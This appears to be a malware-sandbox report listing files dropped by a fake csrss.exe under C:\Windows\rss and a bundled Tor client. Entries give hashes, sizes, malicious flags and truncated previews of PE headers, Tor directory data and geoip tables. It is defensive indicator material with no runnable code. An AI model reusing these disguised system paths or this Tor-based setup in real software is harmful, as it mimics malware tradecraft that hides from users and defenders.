                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7344128
                                                          Entropy (8bit):6.357813724347352
                                                          Encrypted:false
                                                          SSDEEP:49152:1DFOHg877aK8TVGV5KQcBZizR/BLzTu7AXiyaxI8XqHgN12StmcOr2Ot65At1/jX:1FO8HZYBBLzTG5IWzf26eCS/jJDPFfJ
                                                          MD5:61275FE567B258A897943911C450E57E
                                                          SHA1:F7ABDD7779272EEEDA371CAA52CFC5BA3B608C84
                                                          SHA-256:21F7A32152D87672649F15F5EFDE5D0F6DFC00763DDC19486CF4178D1B642F65
                                                          SHA-512:218473CAE7B8E0F011DF46863409772F9DB87283C91E2CFF52FEE9365230BE87AD040EE031F002F91262F8FD69B66DB3BBDC97F20B8F90162B88CAEF0919AE69
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........p...............5.........p........0g...@...........................r...........@...................................n...............................n..................................................... 0g..............................text...o.5.......5.................`..`.rdata..<-1...6...1...5.............@..@.data... S...0g......"g.............@....idata........n......&l.............@....reloc........n......*l.............@..B.symtab.......r.......p................B................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3987500
                                                          Entropy (8bit):4.0110114531289485
                                                          Encrypted:false
                                                          SSDEEP:49152:DafG4adBZfUJczDMlXCbuxCCAjnk+AS3IDTN5v6iuXTvz:J
                                                          MD5:C72911DEC6AE8C4BC62BB2A6A21BA85B
                                                          SHA1:0AE7077313A53103C2B32100D74AAFC04216289D
                                                          SHA-256:7E777EFC194EA9788171636085B19875D19397D3249FBB88136534037A3DC38F
                                                          SHA-512:99DC9761AD69F5508D96A2362B930728D451F5DDCF7BB1E210EC5B0F14EE00EE71EFAAAB150FFA16A2F92FBBB1E2A6B5CD92D51721996DF7AC794491C441C304
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):5919292
                                                          Entropy (8bit):3.1083240413253934
                                                          Encrypted:false
                                                          SSDEEP:24576:OSVA+ByKCLUCVEPycvUlmx0oLPTvmCg1e1GSxD80xmSLpjLrnMLTjnTzP7HxLfz3:Y
                                                          MD5:ED2F9B19DD1584D7E26F5BA460EF2FBF
                                                          SHA1:DCBF1789BF1EEB03276B830CB2AB92BCF779D97F
                                                          SHA-256:F11BD1D7546CAD00B6DB0A1594F3AC1DAF9F541004FD7EFB5414E068693D6ADD
                                                          SHA-512:DCFC780D1E34968390969B64EA2091B630C8EEC94AC4724A4103A003A2F31545C3791A39F514517153538B4D3F5C50B6BFBA74CC9CF8C0B1B5DABA0A4849C856
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):14018
                                                          Entropy (8bit):6.052487508143452
                                                          Encrypted:false
                                                          SSDEEP:384:4U4IoVM1h8t//4DVEl1hnnd4oGbVla1hQfy2h4YVc1h162q41o8XVKu1h9byd24r:1wyCnyKDd1ImOy6xyhCM3hb62M1uk
                                                          MD5:70BC31E2A64CD5707571C28522621E5A
                                                          SHA1:2C742BEBCFB5C9BA24BECD6F5306FD6D55F743B4
                                                          SHA-256:B8147B79C685D063DC1866EF9396EFF64AB27DE8FAAE91D79129945F7A4A0874
                                                          SHA-512:31B6F78FF065A86D90538A51C83DD9BECF47C6BF9932EB0640511A41922ED729B4F9BB1BC034E65B895FD147A21C3A8E9BFBB6B9B4C36D0B8D2F6583FBEEECB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint 49015F787433103580E3B66A1707A00E60F2D15B..dir-key-published 2023-04-05 17:47:59..dir-key-expires 2023-07-05 17:47:59..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAxVbS0noZKz1Ei6858RGyyuQgwQUKG4Urrp2BiAzkYxwX+6fURlut..AjeLb4XysqCdNdUipuLRQ2QIy1C220QiCHV6jZAsM4tmEq6TpK6q1lxi5YPKqbGS..CfUQFT1nO4s4DCYSLCwiRNy6bMe8tNHc0MpXP3loCbPkYCoXrEL6vYIROw3oeGWE..KbFPQrzYJAPHgUubBibsY5lkUY9N/5QZw2y1bn+dq9mFOoCIHLd6DkQmySmftnMe..QrpYA2WvE4M5yN2HB8QGT7TdzXPPL6889rFw/mjqYExQPX7cqmILkchsB7I5whjA..u0oodF8Y9ooK9QT0GeK4h3xQhzNG17anuUxbZ7sxzmBwBNmkNyLWEeIntazyjRFr..P2mDY/9YK2JOQKkh3tKl1whcCG9ZtAhKmm/ijG7OrhqtusdGKBXIgALf4f111AK1..gNcacDx2fJzRHuNK8zkIORAzStxKdLbAbBNeLENk1zBjSkrxCOJH4mBpr8TXULq1..ThLI/8OzZq4LAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvv0TXkvzn4wlk6zF5qvalq3Qt0s3Uj4N6AqDRiX4ouPR3u64ZKvO..V0po5LKo1NiqFsHQW5U64SVYpG6z6QkG0dzCXGyOrm0FVlTA4OE2UErBkjzwRpMZ..wCyTRunJ1wfPNsptuV6zqVWijDwY
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (9078)
                                                          Category:dropped
                                                          Size (bytes):14009460
                                                          Entropy (8bit):4.9630162100579
                                                          Encrypted:false
                                                          SSDEEP:24576:2QhTBG1rutAkXxYtxXsw1VrNeyaeB/GU9LUr3+sw2jc/PmYcv6vxZsvwsuwymW1I:+7sNRqdDlMw3PLYMktWMqnnA
                                                          MD5:700CA6B4D8E515BCCAC9066168B896B4
                                                          SHA1:0ACCB17CAE34051830682C1175F25115DC77E280
                                                          SHA-256:9EA0A094EB06B77DD6F27F912F4C4A165177A381FA23BA402559CC92DF1BB737
                                                          SHA-512:CBDC8837284EF8157F91EA69AF9DEC689D68171F813BAEB584CE1E6421B735254ED71F31A67AB2821F4725FC6465B947D599309D137C3EC8E72C9421BBBEAEF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALwsq0GmRyaUh05wWhds0hTmgRlpGGMQssrYiZraMv27duNoe1zHgDfF.HyRB/AwyzrUdcAPe6Fzn3wm6g/gMFeLMnDuiNLygrEKCACpgxc87wKSZD9GjmPYk.czZZnWnkrMgDLxZDs1vzgVBPSxVgUGclmzGiFTJ2XbqSTRTfKbVXAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key o9raTUkJ9UbJD+Grd3A1L08RP6eveXOXpavhJTrWt2Q.id ed25519 sMwKMpHEKTtQvxL9pNqpHDkvhsBdDZ76CiOENchaQ6g.@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALKcnlrLGm0XstKznRPb9LAdE5WdvvdkG+q6X60MK+y/FYGS1O3b5uUz.ppqlqZQRtzG0/rqks57Z9JUIpV8SV7ne3Bpjx1KwJrc1tRUCYcl7O0/8evq4i6iQ.8z37Afet5Ezm+eu7KKNXa/Dq1F9fo7iaFS0JMkqHBPSfEocIfqcpAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key lKXFiK86hTe2lG5JSu9sxs9sccv227DVAlU/9fi1pWc.id ed25519 cpqJBuuDju7s2R8Z+iJrjHkEFQviOzXmW0h252gOTXc.@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAKhDKfsb7jTbu63Z6nEKy80CQsjel1fD38vN/GxJj5KwgMHaNR2lA4v+.KjHp/obU3PhMcwOB0hzjRWdSe7gH5niew3hi8QiP/qrKd
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3987500
                                                          Entropy (8bit):4.0110114531289485
                                                          Encrypted:false
                                                          SSDEEP:49152:DafG4adBZfUJczDMlXCbuxCCAjnk+AS3IDTN5v6iuXTvz:J
                                                          MD5:C72911DEC6AE8C4BC62BB2A6A21BA85B
                                                          SHA1:0AE7077313A53103C2B32100D74AAFC04216289D
                                                          SHA-256:7E777EFC194EA9788171636085B19875D19397D3249FBB88136534037A3DC38F
                                                          SHA-512:99DC9761AD69F5508D96A2362B930728D451F5DDCF7BB1E210EC5B0F14EE00EE71EFAAAB150FFA16A2F92FBBB1E2A6B5CD92D51721996DF7AC794491C441C304
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):5919292
                                                          Entropy (8bit):3.1083240413253934
                                                          Encrypted:false
                                                          SSDEEP:24576:OSVA+ByKCLUCVEPycvUlmx0oLPTvmCg1e1GSxD80xmSLpjLrnMLTjnTzP7HxLfz3:Y
                                                          MD5:ED2F9B19DD1584D7E26F5BA460EF2FBF
                                                          SHA1:DCBF1789BF1EEB03276B830CB2AB92BCF779D97F
                                                          SHA-256:F11BD1D7546CAD00B6DB0A1594F3AC1DAF9F541004FD7EFB5414E068693D6ADD
                                                          SHA-512:DCFC780D1E34968390969B64EA2091B630C8EEC94AC4724A4103A003A2F31545C3791A39F514517153538B4D3F5C50B6BFBA74CC9CF8C0B1B5DABA0A4849C856
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3720943
                                                          Entropy (8bit):6.381273721170494
                                                          Encrypted:false
                                                          SSDEEP:98304:hxRZU5tRdTvnt3EhOPE2sgEcgY5PJbBC87I8wpi1CPwDv3uFfJxzX2EeJUO9WL44:XzUJhvnt3EhOP/srcN5PJbBD7TIi1CP3
                                                          MD5:B7C32C8E7D21AA9B79470037227EBA43
                                                          SHA1:38D719B10CA035CEE65162C1A44E2C62123D41B4
                                                          SHA-256:99B4042A858A9E437917C8256692E9BA161B87054CCF5E22538E86BB35C34F23
                                                          SHA-512:D85345380B9605C8484E11873218AA4EAEEA573CA51EEDADA6D0518695A2B184BB22FAF7C5E3D88330935774CED17E9D80C577B06603AA1CA6DAB748B0BD15A7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(/..\.....!...#......*..B................@k..........................0......Y9...@... .......................(.......*.$....P*......................`*.............................l.".....................H.*..............................text...h...........................`..`.data...............................@.`..rdata..hS.......T..................@.`@/4......XX...P#..Z...D#.............@.0@.bss.....A....'.......................`..edata........(.......'.............@.0@.idata..$.....*.......).............@.0..CRT....,....0*.......).............@.0..tls.........@*.......).............@.0..rsrc........P*.......).............@.0..reloc.......`*.......).............@.0B/14..........P+.......*.............@.@B/29.....g....`+.......*.............@..B/41......F....,..H...>,.............@..B/55..........@-.......,.............@..B/67.....8....0.......n-.
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):897308
                                                          Entropy (8bit):6.070043579095594
                                                          Encrypted:false
                                                          SSDEEP:12288:q1db6bzbHbMZFbhb0bvb64AZI6lHkzptOAL2Wt4XCFDsF/Jpt7L7ZG1nkC0xuHSC:+4AZ0zrOAL2M4XvF/tI7HS4P
                                                          MD5:736443B08B5A52B6958F001E8200BE71
                                                          SHA1:E56DDC8476AEF0D3482C99C5BFAF0F57458B2576
                                                          SHA-256:DA1F75B9CE5F47CB78A6930A50C08397EE4D9778302746340F4057FCD838DBF4
                                                          SHA-512:9DFCDB1186B089E7961767D427DE986AD8E5F7715B7592984349D0B8E7F02198137C83E8C79A096A7475AD9F4695F52539FA08FA65912860DDF0A85515A7CDA1
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........N.........!...#......... .................h......................................@... ..........................Y......T............................ ...&...........................z......................P................................text...............................`.P`.data...............................@.`..rdata..............................@.`@/4......L............z..............@.0@.bss.........`........................`..edata...Y.......Z...6..............@.0@.idata..T...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc...&... ...(..................@.0B/14..........P......................@.@B/29..........`......................@..B/41.....{I.......J...r..............@..B/55.....)....P......................@..B/67.....8....@......................@.0B/80.....e....P..........
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):718110
                                                          Entropy (8bit):5.9917560981929405
                                                          Encrypted:false
                                                          SSDEEP:12288:iW3bb6bRbHbIZJbhbgbvb5m1A73b/0kPxuPL32s4tijTHK2jtki943eAWnVC1uLx:im1A73b/0kPxuPL32LMvHHtkcMtwv
                                                          MD5:F1BCC8BD3200845993211EB807F33E56
                                                          SHA1:D25274E36E79D8E50A446B1144D8B6F2B2CF309B
                                                          SHA-256:7CD199BBF3BFE19182C5ECA3A080A7E93CEC0D30CBD872A305C92BC9282A7399
                                                          SHA-512:397BA6B995AEBCE54B95C7F3ABD3C64AE2C5AB3D01FB38185F8FCCAD82CAC335E2F0666FC47B73D3A3A4AF9B5A5CE311E4963841616F4D38B03E1BC16355B5BB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........p......!...#.V...................p....0n.................................`....@... .........................i<..............................................................................................L............................text....T.......V..................`.P`.data........p.......\..............@.`..rdata...V.......X...`..............@.`@/4..................................@.0@.bss.........p........................`..edata..i<.......>...<..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B/14.......... ......................@.@B/29.....W....0......................@..B/41......G.......H...F..............@..B/55.......... ......................@..B/67.....8............v..............@.0B/80.....[.... .......x..
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):509893
                                                          Entropy (8bit):5.923804968499278
                                                          Encrypted:false
                                                          SSDEEP:12288:99tor7gVS5W5rHNYOXB1XEtrfI8Vu1nmCuXZS:vV2W5rHuO0tuyZS
                                                          MD5:F963552B851FDE3834405BB98BAE0C36
                                                          SHA1:822C7D7988AC28ACA080DBC9C26F98416F67124F
                                                          SHA-256:36C66CFC6E9663BDD2CDC54A1253A8C26C837CA0BD8C52769B5820641C18D4C3
                                                          SHA-512:B301DF8740E07C1032E959E563842D568916F7165F72C459C0FFCBE1A717B0886BE1D2EF8B992875392A09983AE9E35E7481B29C213A18EE15B335A9849CF39B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........R.........!...#.*...................@.....d.................................3....@... .............................. ..`............................`...............................~.......................#...............................text....(.......*..................`.P`.data...4....@.......0..............@.`..rdata...A...P...B...2..............@.`@/4.......K.......L...t..............@.0@.bss....P.............................`..edata........... ..................@.0@.idata..`.... ......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/14.....P...........................@.@B/29......).......*..................@..B/41.....h4.......6...@..............@..B/55.....k............v..............@..B/67.....8...........................@.0B/80.....F...............
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):684853
                                                          Entropy (8bit):5.811518800721527
                                                          Encrypted:false
                                                          SSDEEP:6144:X8lWUP47MlXxv9XQh2ACuBs4Npf4XCdzNe/+Qg3K2tUzVprtk4kpQANYErfxAdba:X8lWUOUhp4Df8CdzNAlacpmpxTxOno3/
                                                          MD5:36E1C3814BDE3418BA3D38517954CB7C
                                                          SHA1:495E1BA5B0B442E70124D33DAA6FEA4E3E5931B0
                                                          SHA-256:B34EDD252F46DD881E79CFD274777FE5E90943D511C8E002AECA0528D7F3B4B1
                                                          SHA-512:DF7B608C51A782AD5CDFD753577A3DCACF4E2515AC02CE9E35B3CBC543895862844E8ADCAFF983B1348884085CF7427C33A67ACC5CE48FE656F5B2083D0813B0
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........L.........!...#.d.........................n................................X.....@... .........................u.......x............................@.......................................................................................text....b.......d..................`.P`.data...(............j..............@.0..rdata...............l..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x...........................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..reloc.......@......................@.0B/14.....h....P......................@.@B/29..........`......................@..B/41......w...@...x..................@..B/55......\.......^...:..............@..B/67.....d.... ......................@.0B/80..........0..........
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):960709
                                                          Entropy (8bit):6.030141692420098
                                                          Encrypted:false
                                                          SSDEEP:24576:UzD0YeAxldPO03IIYHpu0FeJ/xpyvpcu1UYahUo24yjFp+PnpFX:6D0neO03ILu08J/nu1UYaio24yjFp+/7
                                                          MD5:D92E59B71BF8A0D827597ED95B2ECA42
                                                          SHA1:CFC49FF29EDDB7127FBED166A8A1E740EA3DFB9A
                                                          SHA-256:B6EF5CB4C093431F3E73C53E66DF33D08237BA46D457D119A2C4DCAE582314E3
                                                          SHA-512:BE65E003A498E753B08912D697E9B4D8A28828581C17D1E8E20880372A81030CE18610EEFF230C8880E68A831041075BB2EBFFCF318D29EBF58BC856FAC3DF04
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!...#..................... .....j......................... .......]....@... ......................p..3@.......>... .......................0..tD...........................M...................... ................................text...............................`.P`.data....,... ......................@.`..rdata.......P.......<..............@.`@/4...........p.......Z..............@.0@.bss....p....`........................`..edata..3@...p...B...F..............@.0@.idata...>.......@..................@.0..CRT....,...........................@.0..tls................................@.0..rsrc........ ......................@.0..reloc..tD...0...F..................@.0B/14.................................@.@B/29.....K...........................@..B/41.....g,..........................@..B/55......x.......z...@..............@..B/67.....8....@..........
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):97293
                                                          Entropy (8bit):5.293554162664098
                                                          Encrypted:false
                                                          SSDEEP:768:NRGwbtFOT3Ro1tpuBNtodXD+H7cK2ULAvU0YVLI4aVeTH9Bve8EuIIRUC:NPbtFOT3RKoBNKN+H7T2U4UaAD9BvZ2C
                                                          MD5:7CDBACA31739500AEFC06DD85A8558FF
                                                          SHA1:ADC36EC6A3CDC7E57A1B706C820E382627F6CB90
                                                          SHA-256:0A1DEE5DD5234971F7526F3D5F8B7E2CFDCB536E18DEBD51C985010FB504FBDB
                                                          SHA-512:6DF8AC9054F27EBBEF9642CE79FF7BA836411EA0ED0BD04B3CFE724A336A91F665C2CC0B7A4BFC99A80786D1A6D361B971A7DBB7A298B919A1BAA812541841BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!...#.....@...............0.....h.....................................@... ......................p..i....................................................................@.......................................................text...X...........................`.P`.data...(....0......."..............@.0..rdata.......@.......$..............@.0@/4......d....P.......*..............@.0@.bss.........`........................0..edata..i....p.......6..............@.0@.idata...............8..............@.0..CRT....,............>..............@.0..tls.................@..............@.0..reloc...............B..............@.0B/14..................F..............@.@B/29......v.......x...J..............@..B/41..........P......................@..B/55.....p....p... ..................@..B/67.....8...........................@.0B/80.....N...............
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):308415
                                                          Entropy (8bit):5.79072242634744
                                                          Encrypted:false
                                                          SSDEEP:6144:eiokqhPm3YvXEXSDYpAHijb6vbhgG4Mlv5FNJ2z+BKTkxde:eikPm3YvXEIYpAHijb6vbhuMd5l2JTkq
                                                          MD5:07F4BBF18077231CB44750684DD8DAF4
                                                          SHA1:8560627E9E05D6022ABDFE7E576856E91AC90188
                                                          SHA-256:4A146671B1FED4906799CB1CFC670753F1B1922793F5B40D5CF710BEFB287316
                                                          SHA-512:04E31AD60E797CDBD1F3DB36A8473139BBD1B763D2D67A160454B24B524E8BBC4D5784C62446A0F9D83B95DD518534AB4581D3A43A14146B17D0035ECC79C151
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........f......!...#.....j.....................d.................................m....@... ..............................0..<....`..P....................p......................................................|1..@............................text............................... .P`.data...H...........................@.0..rdata..............................@.0@/4.......2.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..<....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B/14.................................@.@B/29......v.......x..................@..B/41......9.......:...z..............@..B/55..........P......................@..B/67..................V..
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (350), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4474
                                                          Entropy (8bit):5.315117333619097
                                                          Encrypted:false
                                                          SSDEEP:48:cJoZBmpEsBwBbf+JyVSZBiDGDu+j4IlqZCplIMblBEYAI9Oxf5:adwBbZSZ4GDuCtuCbIQqcO55
                                                          MD5:019F63C8BEBE11B92621E04908388088
                                                          SHA1:C65EEC30785314FCC0791286CE252B4C26919DBC
                                                          SHA-256:63EDBA6639C862FD5BB76F03BA2D365150CEAD62FC6C357EA952110196C701F8
                                                          SHA-512:FA862B639D637E03C6E39144485454A4A0BB089C4E3A17C592F09DFAD1365977077C001CC80A327CF761693F5A7855A719F75A7F3C7BD61ACC547FA78B550FE1
                                                          Malicious:false
